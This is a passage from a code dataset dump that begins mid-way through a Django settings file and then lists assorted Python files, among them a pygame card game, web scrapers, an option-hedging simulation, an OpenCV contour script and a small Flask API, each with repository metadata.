'Europe/Amsterdam'\n\nUSE_I18N = True\n\nUSE_L10N = True\n\nUSE_TZ = True\n\n\n# Static files (CSS, JavaScript, Images)\n# https://docs.djangoproject.com/en/1.6/howto/static-files/\nSTATIC_ROOT = '' # added to avoid AttributeError: 'NoneType' object has no attribute 'endswith' which is thrown when running selenium tests from functional_tests\nSTATIC_URL = '/static/'\nTEMPLATE_DIRS = [os.path.join(BASE_DIR, 'templates')]\n\nLOGIN_URL = 'accounts/login/'\n\nREGISTRATION_OPEN = True # If True, users can register\nACCOUNT_ACTIVATION_DAYS = 7 # One-week activation window; you may, of course, use a different value.\nREGISTRATION_AUTO_LOGIN = True # If True, the user will be automatically logged in.\nLOGIN_REDIRECT_URL = '/sequencelistings/' # The page you want users to arrive at after they successful log in\nLOGIN_URL = '/accounts/login/' # The page users are directed to if they are not logged in,\n # and are trying\n\n# logging\n# LOGGING = {\n# 'version': 1,\n# 'disable_existing_loggers': False,\n# 'formatters': {\n# 'verbose': {\n# 'format' : \"[%(asctime)s] %(levelname)s [%(name)s:%(lineno)s] %(message)s\",\n# 'datefmt' : \"%d/%b/%Y %H:%M:%S\"\n# },\n# 'simple': {\n# 'format': '%(levelname)s %(message)s'\n# },\n# },\n# 'handlers': {\n# 'file': {\n# 'level': 'WARNING',\n# 'class': 'logging.FileHandler',\n# 'filename': os.path.join(BASE_DIR, 'log', 'authoringtool.log'),\n# 'formatter': 'verbose'\n# },\n# },\n# 'loggers': {\n# 'django': {\n# 'handlers':['file'],\n# 'propagate': True,\n# 'level':'WARNING',\n# },\n# 'sequencelistings': {\n# 'handlers': ['file'],\n# 'level': 'WARNING',\n# },\n# }\n# }\n","sub_path":"authoringtool/authoringtool/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":3738,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"447256884","text":"import pygame\nimport time\nfrom enum import Enum\n\nfrom outputters.outputter import Outputter\n\n\nclass Colour(Enum):\n WHITE = (255, 255, 255)\n BLACK = (0, 0, 0)\n RED = (255, 0, 0)\n GREEN = (0, 255, 0)\n BLUE = (0, 0, 255)\n PURPLE = (255, 0, 255)\n GREY = (180, 180, 180)\n\n\nclass Graphics(Outputter):\n def __init__(self, width, height):\n pygame.init()\n pygame.display.set_caption(\"Big2\")\n self.width = width\n self.height = height\n self.card_width = self.width / 16\n self.card_height = self.height / 8\n self.screen = pygame.display.set_mode((self.width, self.height))\n\n def choose_cards(self, hand):\n selected_cards = []\n while True:\n for event in pygame.event.get():\n if event.type == pygame.MOUSEBUTTONUP:\n position = pygame.mouse.get_pos()\n if self.play_button.collidepoint(position):\n return selected_cards\n elif any(card.image.collidepoint(position) for card in hand):\n clicked_card = next(\n (y for y in hand if y.image.collidepoint(position)), None\n )\n self.handle_card_click(clicked_card, selected_cards)\n elif event.type == pygame.QUIT:\n pygame.quit()\n\n def handle_card_click(self, clicked_card, selected_cards):\n if clicked_card in selected_cards:\n selected_cards.remove(clicked_card)\n self.move_card_vertically(clicked_card, self.card_height / 2)\n else:\n selected_cards.append(clicked_card)\n self.move_card_vertically(clicked_card, -self.card_height / 2)\n\n def move_card_vertically(self, card, distance):\n pygame.draw.rect(\n self.screen,\n Colour.WHITE.value,\n (card.left, card.top, self.card_width, self.card_height),\n 0,\n )\n self.display_single_card(card, card.left, card.top + distance)\n pygame.display.update()\n\n def display_single_card(self, card, left, top):\n card.left = left\n card.top = top\n card.image = pygame.draw.rect(\n self.screen, card.colour, (left, top, self.card_width, self.card_height), 0\n )\n self.display_text(\n str(card.pp_value), 60, Colour.GREY.value, card.colour, (left, top)\n )\n\n def display_text(self, text, size, colour, background, location):\n basic_font = pygame.font.SysFont(None, size)\n words = basic_font.render(text, True, colour, background)\n self.screen.blit(words, location)\n\n def display_player(self, player, cards):\n self.screen.fill(Colour.WHITE.value)\n pygame.draw.ellipse(\n self.screen,\n Colour.GREY.value,\n (self.width / 6, self.height / 4, 2 * self.width / 3, self.height / 2),\n 0,\n )\n self.play_button = pygame.draw.rect(\n self.screen,\n Colour.GREY.value,\n (\n 6 * self.width / 7,\n 3 * self.height / 4,\n 2.1 * self.card_width,\n 0.5 * self.card_height,\n ),\n 0,\n )\n self.display_text(\n \"Play/pass\",\n 30,\n Colour.PURPLE.value,\n Colour.GREY.value,\n (6 * self.width / 7, 3 * self.height / 4),\n )\n self.display_text(\n f\"Player {player.name}:\",\n 30,\n Colour.PURPLE.value,\n Colour.WHITE.value,\n (0, 3 * self.height / 4),\n )\n self.display_cards(\n cards,\n self.width / 2 - 2.5 * self.card_width,\n self.height / 2 - 0.5 * self.card_height,\n )\n\n def display_cards(self, cards, left, top):\n for i in range(0, len(cards)):\n self.display_single_card(cards[i], left + i * self.card_width, top)\n pygame.display.update()\n\n def display_message(self, message):\n self.display_text(\n message,\n 30,\n Colour.PURPLE.value,\n Colour.GREY.value,\n (self.width / 10, self.height / 3),\n )\n pygame.display.update()\n time.sleep(5)\n\n def error(self, message):\n pass\n # self.display_text(message, 30, Colour.PURPLE.value, Colour.GREY.value, (self.width/10, self.height/3))\n # pygame.display.update()\n # time.sleep(5)\n","sub_path":"outputters/graphics.py","file_name":"graphics.py","file_ext":"py","file_size_in_byte":4507,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"476470294","text":"# -*- coding: utf-8 -*-\n\nfrom sqlalchemy.ext.declarative import declarative_base\nfrom sqlalchemy.orm import registry\nfrom sqlalchemy.schema import MetaData\n\n__all__ = ['metadata', 'mapper_registry']\n\n# Recommended naming convention used by Alembic, as various different database\n# providers will autogenerate vastly different names making migrations more\n# difficult. See: https://alembic.sqlalchemy.org/en/latest/naming.html\nNAMING_CONVENTION = {\n \"ix\": \"ix_%(column_0_label)s\",\n \"uq\": \"uq_%(table_name)s_%(column_0_name)s\",\n \"ck\": \"ck_%(table_name)s_%(constraint_name)s\",\n \"fk\": \"fk_%(table_name)s_%(column_0_name)s_%(referred_table_name)s\",\n \"pk\": \"pk_%(table_name)s\"\n}\n\nmetadata = MetaData(naming_convention=NAMING_CONVENTION)\nmapper_registry = registry(metadata=metadata)\n#Base = declarative_base(metadata=metadata)\n","sub_path":"amnesia/db/meta.py","file_name":"meta.py","file_ext":"py","file_size_in_byte":836,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"495514120","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri May 31 00:34:05 2019\n\n@author: nghdavid\n\"\"\"\nimport pandas as pd\nimport requests\nfrom bs4 import BeautifulSoup\nfrom requests_html import HTMLSession\n\n\n# It takes a yahoo website as input\n# It returns a panda dataframe that contains lists of Chinese names and English names and schedule websites and movie websites and introductions\ndef yahooMovieParser(url):\n r = requests.get(url)\n web_content = r.text\n soup = BeautifulSoup(web_content,'lxml')\n #時刻表\n newMovie3 = soup.find_all('div',class_=\"release_btn color_btnbox\")\n \n links = []\n for t in newMovie3:\n try:\n links.append(t.find('a',class_=\"btn_s_time gabtn\")['href'])\n except:\n links.append(0)\n \n \n # 中英文片名\n newMovie2 = soup.find_all('div', class_ = \"release_movie_name\")\n NameCHs = [t.find('a', class_='gabtn').text.replace('\\n','').replace(' ','') for t in newMovie2]\n NameENs = [t.find('div', class_='en').find('a').text.replace('\\n','').replace(' ','') for t in newMovie2]\n \n #Movie website\n websites = [t.find('a', class_='gabtn')['href'] for t in newMovie2]\n \n # 電影介紹\n newMovie4 = soup.find_all('div',class_=\"release_text\")\n Intros = [t.find('span').text.replace('\\n','').replace('\\r','').replace('\\xa0','').replace(' ','') for t in newMovie4]\n #合併成data frame\n df = pd.DataFrame(\n {\n 'Name':NameCHs,\n 'EnName':NameENs,\n 'time': links,\n 'Intro': Intros,\n 'Web': websites\n })\n return df\n\n#A function that take website as input\n#It returns next webpage\ndef getNext(url):\n r = requests.get(url)\n web_content = r.text\n soup = BeautifulSoup(web_content,'lxml')\n pageInfo = soup.find('div', class_='page_numbox')\n tagA = pageInfo.find('li', class_=\"nexttxt\").find('a')\n if tagA:\n return tagA['href']\n else:\n return None\n \n#A function that take schedule website as input\n#It returns a dictionary that store time\ndef get_schedule(html):\n schedule = {}\n for i in html.find('div.area_timebox'):\n city = i.text[0:2]\n theater_schedule = {}#It store theaters in a same city\n for theater in i.find('ul'):\n \n times = []\n t = theater.text\n t = t.split(' ')\n for x in range(len(t)):\n if x >0:\n times.append(t[x][-5:-1]+t[x][-1])#time as string\n theater_schedule[t[0]] = times#t[0] is theater \n \n schedule[city] = theater_schedule\n return schedule\n\n#Input 為 電影的主頁\n#Output 為 電影種類 imdb分數 上映日期 電影長度 電影圖片網址\n#如果查不到 imdb,就回傳 電影種類 -1 上映日期 電影長度 電影圖片網址\ndef get_type(time_url):\n #進到網頁拿html\n r = requests.get(time_url)\n web_content = r.text\n soup = BeautifulSoup(web_content,'lxml')\n info = soup.find('div', class_='level_name')\n info1 = soup.find_all('span')\n types = info.text.replace('\\n','').replace(' ','')\n types = types.split('/')\n photo = soup.find('div', class_='movie_intro_foto').find('img')['src']\n has_imdb = 0#有無imdb\n for i in info1:\n if i.text[0:4] == 'IMDb':\n imdb = float(i.text[7:-1]+i.text[-1])\n has_imdb = 1\n if i.text[0:4] == '上映日期':\n date = i.text[5:-1]+i.text[-1]\n if len(i.text)>0:\n if i.text[0] == '片':\n length = i.text[6:-1]+i.text[-1]\n if has_imdb:\n return types,imdb,date,length,photo\n else:\n return types,-1,date,length,photo\n \n\n\nurl = 'http://movies.yahoo.com.tw/movie_intheaters.html'\nurlList = []\n \nwhile url:\n urlList.append(url)\n url = getNext(url)\n\n#Get Chinese names and English names and schedule websites and movie websties and introductions\nMovieInfo = None\nfor url in urlList:\n d1 = yahooMovieParser(url)\n if MovieInfo is None:\n MovieInfo = d1\n else:\n MovieInfo = MovieInfo.append(d1,ignore_index=True)\n\n#\n#Get schedules\nschedules = []\nfor time_url in MovieInfo['time']:\n print(\"Get schedule\")\n print(time_url)\n if time_url == 0:\n schedule = 0\n schedules.append(schedule)\n continue\n session = HTMLSession()\n r = session.get(time_url)\n r.html.render(timeout=100)\n schedules.append(get_schedule(r.html))\nMovieInfo['schedule'] = schedules\n\n#爬 電影種類 imdb分數 上映日期 電影長度 電影圖片網址\ntypes = []\nimdbs = []\ndates = []\nlengths = []\nphotos = []\nfor time_url in MovieInfo['Web']:\n movie_type,imdb,date,length,photo = get_type(time_url)\n types.append(movie_type)\n ################################\n imdbs.append(imdb)#請注意,如果imdb為-1這代表查不到imdb\n ################################\n dates.append(date)\n lengths.append(length)\n photos.append(photo)\n#併到dataframe\nMovieInfo['type'] = types\nMovieInfo['imdb'] = imdbs\nMovieInfo['release_date'] = dates\nMovieInfo['length'] = lengths\nMovieInfo['photo_website'] = photos#電影圖片網址\n\n\"\"\"\nfor i in range(len(MovieInfo)):\n print(MovieInfo['Name'][i]) \n print(MovieInfo['type'][i])\n print(MovieInfo['imdb'][i])\n print(MovieInfo['release_date'][i])\n print(MovieInfo['length'][i])\n print(MovieInfo['photo_website'][i])\n print()\n\"\"\"\nprint(\"david part finish\")\n\n\nMovielist = [] # Movie名稱陣列\n \n\nfor i in range(len(MovieInfo)):\n\tMovielist.append(MovieInfo['Name'][i]) \n\t\n\n#print(Movielist)\n\n\nCount = 0\nMoviedict = {}\t #電影的dictionary\n\n\nfor j in Movielist:\n\tMoviedict[j] = []\n\tMoviedict[j].append(MovieInfo['Name'][Count]) #中文名稱\n\tMoviedict[j].append(MovieInfo['type'][Count]) #類型\n\tMoviedict[j].append(MovieInfo['release_date'][Count]) #上映時間\n\tMoviedict[j].append(MovieInfo['length'][Count]) #長度\n\tMoviedict[j].append(MovieInfo['imdb'][Count]) #IMDB分數\n\tMoviedict[j].append(MovieInfo['Intro'][Count]) #簡介\n\tMoviedict[j].append(MovieInfo['schedule'][Count]) #時間表\n\tMoviedict[j].append(MovieInfo['photo_website'][Count]) #圖片網址\n\t\n\n\n\tCount += 1\n\"\"\"\n\tfor i in range(8):\n\t\tprint(Moviedict[j][i]) #印出有分行版\n\n\"\"\"\nprint(Moviedict) #印出無分行版\n\n","sub_path":"DICT-final.py","file_name":"DICT-final.py","file_ext":"py","file_size_in_byte":6340,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"551890384","text":"from algo_ds.cormen_bst import *\nimport unittest\n\nclass TestBst(unittest.TestCase):\n def test_insert_delete(self):\n # insertion\n bst = BST()\n node50 = Node(50)\n bst.insert(node50)\n bst.insert(Node(40))\n node20 = Node(20)\n bst.insert(node20)\n node10 = Node(10)\n bst.insert(node10)\n bst.insert(Node(30))\n bst.insert(Node(60))\n res = []\n bst.root.inorder_walk(lambda node: res.append(node.key))\n self.assertEqual(res, [10, 20, 30, 40, 50, 60])\n self.assertEqual(bst.root.left.key, 40)\n self.assertEqual(bst.root.left.left.key, 20)\n\n # deletion\n bst.delete(node10)\n res = []\n bst.root.inorder_walk(lambda node: res.append(node.key))\n self.assertEqual(res, [20, 30, 40, 50, 60])\n\n bst.delete(node20)\n res = []\n bst.root.inorder_walk(lambda node: res.append(node.key))\n self.assertEqual(res, [30, 40, 50, 60])\n\n bst.delete(node50)\n res = []\n bst.root.inorder_walk(lambda node: res.append(node.key))\n self.assertEqual(res, [30, 40, 60])\n","sub_path":"tests/test_cormen_bst.py","file_name":"test_cormen_bst.py","file_ext":"py","file_size_in_byte":1136,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"282652985","text":"import exotic_options.exotic_option_utilities as exotic_util\nimport Utilities.svi_prepare_vol_data as svi_data\nfrom bs_model import bs_estimate_vol as bs_vol\nfrom Utilities.utilities import *\nimport Utilities.hedging_utility as hedge_util\nimport os\nimport pickle\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport Utilities.plot_util as pu\nimport math\n\nwith open(os.path.abspath('..')+'/intermediate_data/total_hedging_daily_params_calls_1.pickle','rb') as f:\n daily_params = pickle.load(f)[0]\nwith open(os.path.abspath('..') + '/intermediate_data/total_hedging_dates_calls_1.pickle', 'rb') as f:\n dates = pickle.load(f)[0]\nwith open(os.path.abspath('..')+'/intermediate_data/total_hedging_daily_svi_dataset_calls_1.pickle','rb') as f:\n daily_svi_dataset = pickle.load(f)[0]\nwith open(os.path.abspath('..') +'/intermediate_data/total_hedging_bs_estimated_vols.pickle','rb') as f:\n estimated_vols = pickle.load(f)[0]\n\n# Evaluation Settings\nbegDate = ql.Date(19,1,2017)\ncalendar = ql.China()\ndaycounter = ql.ActualActual()\nbegDate = calendar.advance(begDate,ql.Period(1,ql.Days))\nfee = 0.6/100\nsimDates = 50\nnp.random.seed()\nnoise = np.random.normal(0, 1, simDates)\n\ncurve = svi_data.get_curve_treasury_bond(begDate,daycounter)\ncal_vols, put_vols, maturity_dates, S0, risk_free_rates = daily_svi_dataset.get(to_dt_date(begDate))\nmaturityDate = to_ql_date(maturity_dates[3])\n\n# Down and out Call\noptiontype = ql.Option.Call\n\nstrike = S0\n# Knock out : Barrier at OTM\nbarriers = [S0-0.1]\nbarrierType = ql.Barrier.DownOut\n# Reverse knock out : Barrier at ATM\n#barriers = [S0+0.1]\n#barrierType = ql.Barrier.IpOut\n\nexercise = ql.EuropeanExercise(maturityDate)\npayoff = ql.PlainVanillaPayoff(optiontype, strike)\nunderlying = ql.SimpleQuote(S0)\n\ncalibrated_params = daily_params.get(to_dt_date(begDate)) # on calibrate_date\nblack_var_surface = hedge_util.get_local_volatility_surface(calibrated_params, to_ql_dates(maturity_dates),\n begDate, daycounter, calendar, S0,\n risk_free_rates)\nconst_vol = estimated_vols.get(to_dt_date(begDate))\nyield_ts = ql.YieldTermStructureHandle(curve)\ndividend = ql.YieldTermStructureHandle(ql.FlatForward(begDate, 0.0, daycounter))\nrf = curve.zeroRate(maturityDate, daycounter, ql.Continuous).rate()\nprocess_svi = ql.BlackScholesMertonProcess(ql.QuoteHandle(underlying), dividend,\n yield_ts, ql.BlackVolTermStructureHandle(black_var_surface))\nplot = True\nprint(\"=\" * 120)\nprint(\"%15s %20s %20s %20s %20s \" % (\"barrier\", \"hedge_error_bs\", \"hedge_error_svi\",\n \"hedge_cost_bs\", \"hedge_cost_svi\"))\nfor barrier in barriers:\n\n barrier_flag = False\n if plot:\n print(\"=\"*100)\n print(\"%15s %25s %25s %25s\" % (\"maturityDate\",\"barrier\",\"strike\", \"spot\"))\n print(\"%15s %25s %25s %25s\" % (maturityDate,barrier,strike, S0))\n print(\"=\"*100)\n\n if plot:\n print(\"=\"*120)\n print(\"%15s %15s %15s %15s %15s %15s %15s\" % (\"date\",\"spot\",\"hedging_error_bs\",\n \"hedging_error_svi\",\"replicate_bs\",\n \"replicate_svi\",\"reference_npv\"))\n print(\"-\"*120)\n delta_bs_previous = 0.0\n delta_svi_previous = 0.0\n hedging_errors_bs = []\n hedging_errors_svi = []\n hedging_costs_bs = []\n hedging_costs_svi = []\n path = []\n delta_t = 1.0/251\n spot = S0\n ttm = daycounter.yearFraction(begDate, maturityDate)\n vol_svi = black_var_surface.blackVol(ttm, strike)\n underlying.setValue(spot)\n option_price = exotic_util.barrier_npv_ql(begDate, path, barrierType, barrier, payoff, exercise,\n process_svi)\n for nbr_date in range(simDates):\n date = calendar.advance(begDate,ql.Period(nbr_date,ql.Days))\n # Delta hedge\n if option_price == 0.0:\n delta_bs = 0.0\n delta_svi = 0.0\n else:\n delta_bs = hedge_util.calculate_delta_bs(date, daycounter, calendar,\n const_vol, spot, rf, strike, maturityDate, optiontype)\n delta_svi = hedge_util.calculate_delta_svi(black_var_surface, date, daycounter, calendar, spot,\n curve.zeroRate(maturityDate, daycounter, ql.Continuous).rate(),\n strike, maturityDate, optiontype)\n underlying.setValue(spot)\n option_price = exotic_util.barrier_npv_ql(begDate, path, barrierType, barrier, payoff, exercise,\n process_svi)\n path.append(spot)\n\n spot = spot + rf * spot * delta_t + vol_svi * spot * np.sqrt(delta_t) * noise.item(nbr_date)\n cash_svi = (option_price - delta_svi * spot)* math.exp(rf* delta_t)\n cash_bs = (option_price - delta_bs * spot)* math.exp(rf* delta_t)\n replicate_svi = delta_svi * spot + cash_svi\n replicate_bs = delta_bs * spot + cash_bs\n hedging_error_bs = replicate_bs - option_price\n hedging_error_svi = replicate_svi - option_price\n hedging_errors_bs.append(hedging_error_bs)\n hedging_errors_svi.append(hedging_error_svi)\n # hedging_costs_bs.append(hedge_cost_bs)\n # hedging_costs_svi.append(hedge_cost_svi)\n if plot: print(\"%15s %15s %15s %15s %15s %15s %15s\" % (date,\n round(spot, 4),\n round(hedging_error_bs, 4),\n round(hedging_error_svi, 4),\n round(replicate_bs, 4),\n round(replicate_svi, 4),\n round(option_price, 4)))\n\n if plot:\n print(\"=\" * 120)\n print(\"%15s %20s %20s %20s %20s \" % (\"barrier\", \"hedge_error_bs\", \"hedge_error_svi\",\n \"hedge_cost_bs\", \"hedge_cost_svi\"))\n print(\"-\" * 120)\n print(\"%15s %20s %20s %20s %20s \" % (barrier, round(sum(hedging_errors_bs), 4),\n round(sum(hedging_errors_svi), 4),\n round(sum(hedging_costs_bs), 4),\n round(sum(hedging_costs_svi), 4)))\nprint(\"=\" * 120)\n","sub_path":"exotic_options/delta_hedge_knock_out_call_mc.py","file_name":"delta_hedge_knock_out_call_mc.py","file_ext":"py","file_size_in_byte":6669,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"653888199","text":"'''import cv2\nimport imutils\n\n\n\nimage = cv2.imread('tetris_blocks.png')\n\ngray = cv2.cvtColor(image,cv2.COLOR_BGR2GRAY)\nblurred = cv2.GaussianBlur(gray, (4,4),0)\n\nthresh = cv2.threshold(blurred, 60, 255, cv2.THRESH_BINARY)[1]\n\n'''\n\nimport imutils\nimport cv2\n\n#load image as a grayscale\nimage = cv2.imread('puzzle.jpg',0)\n#gray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)\ncv2.imshow('gray', image)\nblurred = cv2.GaussianBlur(image, (5, 5), 0)\ncv2.imshow('blurred', blurred)\nthresh = cv2.threshold(blurred, 200, 255, cv2.THRESH_BINARY)[1]\ncv2.imshow('blurred', thresh)\n\n# find contours in the thresholded image\ncnts = cv2.findContours(thresh.copy(), cv2.RETR_EXTERNAL,cv2.CHAIN_APPROX_SIMPLE)\ncnts = cnts[0] if imutils.is_cv2() else cnts[1]\n\nfor c in cnts:\n M = cv2.moments(c)\n # to get center of contour\n\n # to check if m00 is zero or not to avoid DivisionByZero error\n if M[\"m00\"] != 0:\n cX = int(M[\"m10\"] / M[\"m00\"])\n cY = int(M[\"m01\"] / M[\"m00\"])\n else:\n cX, cY = 0, 0\n\n\n cv2.drawContours(image, [c], -1, (0, 255, 0), 2)\n cv2.circle(image, (cX, cY), 5, (255, 255, 255), -1)\n cv2.putText(image, \"center\", (cX - 30, cY - 30),cv2.FONT_HERSHEY_SIMPLEX, 0.5, (255, 255, 255), 2)\n\n git\n cv2.imshow(\"Image\", image)\n cv2.waitKey(0)\n\n","sub_path":"Contour Play/center_of_contours.py","file_name":"center_of_contours.py","file_ext":"py","file_size_in_byte":1278,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"318215323","text":"\"\"\"\nThis spider is a TimePartner spider created on top of the ATSSpider\nscrapy crawl timepartner -a mining_job_id=9999 -a iteration=1 -a extract=1 -a url=\"http://www.timepartner.com/jobs/uebersicht/suche.html\"\n\nsample url:\nhttp://www.timepartner.com/jobs/uebersicht/suche.html\n\"\"\"\n\nfrom re import compile\nfrom scrapy.http import Request\nfrom scrapy.selector import Selector\nfrom urlparse import urljoin\nfrom brightcorp.base.atsspiders import ATSSpider\nfrom brightcorp.items import BrightcorpItemLoader\nfrom brightcorp.processors import Prefix, RemoveBadElements\n\n\nclass TimePartner(ATSSpider):\n\n name = \"timepartner\"\n url_anchor = \"/no_cache/jobs/uebersicht/suche/jobsearch//0/0/0//%s.html?tx_timepartnerjobs_pi1[geofilterrad]=200\"\n cur_page = 0\n ref_re = compile(r\"(\\d+)\\.htm\")\n\n def start_requests(self):\n yield Request(\n urljoin(\n self.start_urls[0], self.url_anchor % self.cur_page\n )\n )\n\n def parse(self, response):\n sel = Selector(response)\n if self.cur_page == 0:\n job_count = sel.xpath(\n '//div[@class=\"tx-timepartnerjobs-pi1\"]/h3/text()').extract()\n if job_count:\n self.expected_job_count = job_count\n\n logo_url = sel.xpath('//div[@id=\"logo\"]/a/img/@src').extract()\n if logo_url:\n self.logo_url = urljoin(response.url, '/%s' % logo_url[0])\n\n self.cur_page += 1\n jobs = sel.xpath('//table[@class=\"tx_timepartnerjobs_pi1_table\"]//tr')\n for job in jobs:\n job_url = job.xpath('./td/a/@href').extract()\n if job_url:\n job_url = urljoin(response.url, '/%s' % (job_url[0]))\n meta = {\n 'title': job.xpath('./td/a/text()').extract(),\n 'loc': job.xpath('./td[3]/text()').extract(),\n }\n yield Request(\n job_url, callback=self.parse_job_callback(), meta=meta\n )\n\n next_url = sel.xpath(\n '//a[img[contains(@src, \"pagebrowser_next\")]]/@href').extract()\n if next_url:\n next_url = urljoin(\n self.start_urls[0], self.url_anchor % self.cur_page\n )\n yield Request(next_url, callback=self.parse)\n\n def parse_job(self, response):\n loader = BrightcorpItemLoader(response=response)\n\n loader.add_value('url', response.url)\n loader.add_value('title', response.meta['title'])\n loader.add_value('location', response.meta['loc'])\n loader.add_value('logo_url', self.logo_url)\n loader.add_value(\n 'referencenumber', response.url,\n Prefix('%s-' % self.name), re=self.ref_re\n )\n\n loader.add_xpath(\n 'description',\n '//div[@id=\"content_maincol\"]/h1[last()]/following-sibling::node()',\n RemoveBadElements(['img', 'a', 'form'])\n )\n loader.add_xpath(\n 'jobtype',\n '//strong[text()=\"Arbeitszeit: \"]/following-sibling::text()[1]'\n )\n\n yield loader.load_item()\n","sub_path":"brightcorp/brightcorp/spiders/timepartner.py","file_name":"timepartner.py","file_ext":"py","file_size_in_byte":3102,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"259812458","text":"class Personas:\n\tpass\n\tdef __init__(self,nombre,cedula,telefono,email):\n\t\tself.nombre = nombre\n\t\tself.cedula = cedula\n\t\tself.telefono = telefono\n\t\tself.email = email\n\t\n\tdef __str__(self):\n\t\treturn f\"Nombre: {self.nombre}, cedula: {self.cedula}, telefono: {self.telefono}, email: {self.email}\"\n\t\n\tdef cambiar_datos(self, nombre, cedula, telefono, email):\n\t\tself.nombre = nombre\n\t\tself.cedula = cedula\n\t\tself.telefono = telefono\n\t\tself.email = email\n\t\t\ndef agregar():\n nombre = input(\"Nombre: \")\n cedula = input(\"Cedula: \")\n telefono =input(\"Telefono: \")\n email = input(\"Email: \")\n usuario = Personas(nombre,cedula,telefono,email)\n listadepersonas.append(usuario)\n\ndef verc():\n\tfor i in range(0,len(listadepersonas)):\n\t\tprint(f\"{i + 1}- {listadepersonas[i]}\")\n\ndef eliminar():\n\tverc()\n\topcion = input(\"Indique la posición del usuario que desea eliminar: \")\n\topcion= int(opcion)\n\topcion = opcion - 1\n\tlistadepersonas.pop(opcion)\n\ndef modificar():\n\tverc()\n\tmod = int(input(\"Indica la posición del usuario que quieres modificar: \"))\n\tnombre = input(\"Introduce el nuevo nombre: \")\n\ttelefono = input(\"Introduce el nuevo telefono: \")\n\tcedula = input(\"Introduce la nueva cedula: \")\n\temail = input(\"Introduce el nuevo email: \")\n\tlistadepersonas[mod - 1].cambiar_datos(nombre,cedula, telefono, email)\n\t\n\nlistadepersonas = []\n\t\nwhile True:\t\t\n\t\t\n print(\"----------Menu---------------------\\n\")\n print(\"A. Para agregar \")\n print(\"B. Para borrar\")\n print(\"C. Para ver las personas agregadas \")\n print(\"D. Para modificar a algun usuario\\n\")\n print(\"Cualquier tecla para salir \")\n \n print(\"-----------------------------------\")\n opc = input(\"Por favor seleccione una opción: \")\n if opc == \"a\":\n \tagregar()\n elif opc == \"b\":\n \teliminar()\n elif opc == \"c\":\n \tverc()\n elif opc == \"d\":\n \tmodificar()\n else:\n \tbreak","sub_path":"POO.py","file_name":"POO.py","file_ext":"py","file_size_in_byte":1873,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"52936440","text":"import threading\n\nfrom flask import Flask, jsonify\nfrom flask_cors import CORS\n\n# create a variable to store the data\ndata = None\n# create the Flask application\napp = Flask(__name__)\n# make cross-origin AJAX possible\nCORS(app)\n\n# create a method to send the data to the API when requested\n@app.route(\"/\")\ndef send_data():\n # convert into JSON format first\n return jsonify(data)\n\ndef start(host, port):\n # get the host and the port as keywords attributes for app.run()\n app_kwargs = {'host':host, 'port':port}\n # run the app on a thread\n threading.Thread(target=app.run, kwargs=app_kwargs).start()\n threading.Thread.join()\n","sub_path":"Api/Api.py","file_name":"Api.py","file_ext":"py","file_size_in_byte":643,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"129501224","text":"import numpy as np\nimport copy\nimport MySQLdb\nimport re,sys\n\nimport os, sys # 全フォルダ参照\npath = os.path.join(os.path.dirname(__file__), '../../')\nsys.path.append(path)\nfrom mysql_connect import jalan_ktylab_new\nconn,cur = jalan_ktylab_new.main()\n\ndef spot_list(select_spot):\n spot_list = []\n cur.execute(select_spot)\n for i in cur:\n spot_list.append(i)\n return spot_list\n\ndef cossim(x, y):\n return np.dot(x, y) / (np.linalg.norm(x) * np.linalg.norm(y))\n\ndef recommend_all(visited_name,unvisited_name,visited_review,unvisited_review):\n value_UtoV = []\n for i in range(len(unvisited_name)):\n temp_UtoV = []\n for j in range(len(visited_name)):\n unvisited_to_visited = cossim(unvisited_review[i],visited_review[j])\n temp_UtoV.append([visited_name[j],unvisited_to_visited])\n value_UtoV.append(temp_UtoV)\n list_UtoV = list(zip(unvisited_name,value_UtoV))\n list_UtoV_top = []\n for i in range(len(list_UtoV)):\n list_UtoV[i][1].sort(key=lambda x:x[1],reverse=True)\n for j in range(len(list_UtoV[i][1])):\n # if list_UtoV[i][1][j][1] > 0.1: #0.125 / 0.1 /0.05\n list_UtoV_top.append([list_UtoV[i][0],list_UtoV[i][1][j]])\n # else:\n # continue\n return list_UtoV_top\n","sub_path":"cgi-bin/analogy_master_doc2vec/mypackage/doc2vec_recommend.py","file_name":"doc2vec_recommend.py","file_ext":"py","file_size_in_byte":1308,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"279560941","text":"from Scrapper import scrapper as sc\nfrom datetime import datetime\nclass ScrapperSiteMQuemDisse:\n def __init__(self):\n pass\n\n @staticmethod\n def Get_Produto(url):\n soup = sc.Get_Soup(url)\n mydivs = soup.find_all(\"div\",class_ = \"product\")\n lista = []\n for div in mydivs:\n TagProductName = div.find_all(\"div\", class_=\"product-content\")\n texto = TagProductName[0].text.split('\\n')\n TagImage = div.find_all(\"img\")\n productImage = TagImage[0].get('src')\n\n contador = 0\n for r in texto:\n if r != '':\n contador = contador + 1\n if contador == 1:\n productname = r\n if contador == 2:\n valor = r.replace(\"R$\", \"\").replace(\",\", \".\")\n productPrice = float(valor)\n\n ProductDataAcesso = datetime.today().strftime('%Y-%m-%d')\n lista.append({\"Marca\":\"Quem Disse\",\"Nome\":productname,\"Preco\":productPrice,\"imagem\":productImage,\"DataAcesso\":ProductDataAcesso})\n\n return 